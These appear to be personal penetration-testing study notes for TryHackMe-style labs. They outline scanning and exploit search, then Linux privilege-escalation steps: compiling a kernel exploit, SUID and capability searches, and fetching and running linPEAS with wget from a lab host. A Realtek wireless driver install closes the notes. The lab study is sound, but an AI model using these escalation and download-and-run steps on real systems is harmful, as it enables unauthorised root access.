# My Network Information:
# Live Hosts:
# Port Scanning:
# Port By Port:
# Advanced nmap scanning:
# Enumeration:
# Nmap Script ==> By Cat.
# Vulnerability Scanning
# Exploit
# Post Exploitaiton
==========================
# Learn
# Practice
==========================
# Locating Public Exploits
	# Online
		# Exploit-db
		# Packet Storm
		# github
		# Google
	# Offline
		# searchsploit
		# frameworks
		[metasploit -- impacket]
==========================
# Vulnerability Scanning
	# Nessus
	# nmap
		# --script vuln
		# --script vulners.nse
==========================
# Active Directory
==========================
# Linux Privilege Esclation [https://tryhackme.com/room/linprivesc]
	
	# Windows: ==> C:\Temp
	# Linux: ==> /tmp
	# others: ==> Write Permission

	# Local Enumeration
		# Automated Tools
		# Manual
	# Kernal Exploit
		# uname -a
		# search exploit-db
		# gcc 37292.c -o ahmed.c
		# ./ahmed.c
	# Sudo
		# sudo -l
		# gtfobins
	# SUID && SGID
		# find / -type f -perm -04000 -ls 2>/dev/null
		# find / -type f -perm -02000 -ls 2>/dev/null
		# gtfobins
	# Cap
		# getcap -r / 2>/dev/null
		# gtfobins
==========================
# cd /root/Tools/Peas/linPEAS
# python3 -m http.server

# cd tmp
# wget http://10.10.4.216:8000/linpeas.sh
# chmod +x linpeas.sh
# ./linpeas.sh
===========================
# Recab
# https://tryhackme.com/room/linprivesc
# https://tryhackme.com/room/linuxprivescarena
# https://tryhackme.com/room/linuxprivesc

# CTF ==> Proving Ground + Tryhackme
# Nessus
===========================
git clone https://github.com/aircrack-ng/rtl8188eus
cd rtl8188eus
sudo make 
sudo make install
echo 'blacklist r8188eu' | sudo tee -a '/etc/modprobe.d/realtek.conf'
echo 'blacklist rtl8xxxu' | sudo tee -a '/etc/modprobe.d/realtek.conf'

reboot
cd rtl8188eus
rmmod r8188eu rtl8xxxu 8188eu
modprobe 8188eu

shutdown
snapshot